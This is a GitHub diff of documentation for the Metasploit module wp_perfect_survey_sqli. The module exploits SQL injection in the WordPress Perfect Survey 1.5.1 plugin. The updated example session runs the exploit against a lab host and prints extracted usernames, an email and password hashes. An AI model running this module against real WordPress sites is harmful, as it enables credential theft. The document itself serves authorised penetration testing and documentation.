File tree Expand file tree Collapse file tree 1 file changed +11
-8
lines changed
documentation/modules/auxiliary/scanner/http Expand file tree Collapse file tree 1 file changed +11
-8
lines changed Original file line number Diff line number Diff line change @@ -21,10 +21,6 @@ The specific vulnerable version can be found here: https://www.exploit-db.com/ap
2121
2222## Options
2323
24- ### SHOW_FULL_RESPONSE
25- If set to ` true ` , the module will print the entire JSON response received from the server when username and password hash extraction fails.
26- Default is ` false ` .
27-
2824## Scenarios
2925
3026### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04
@@ -43,9 +39,16 @@ TARGETURI => /wordpress
4339msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit
4440[* ] Running module against 192.168.1.104
4541
42+ [* ] Running automatic check (" set AutoCheck false"
43+ [+] The target is vulnerable.
4644[* ] Exploiting SQLi in Perfect Survey plugin...
47- [+] Received a response from the server!
48- [+] Extracted Username: aaryan
49- [+] Extracted Password Hash: $P$BroxbUQTM0N32U7JeMmkXPJrxN9ErZ1
50- [* ] Auxiliary module execution completed
45+ [* ] Extracting credential information
46+
47+ WordPress User Credentials
48+ ==========================
49+
50+ Username Email Hash
51+ -------- ----- ----
52+ admin
[email protected] $P$BwkQxR6HIt64UjYRG4D5GRKYdk .qcR1
53+ msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) >
5154```
You can’t perform that action at this time.
0 commit comments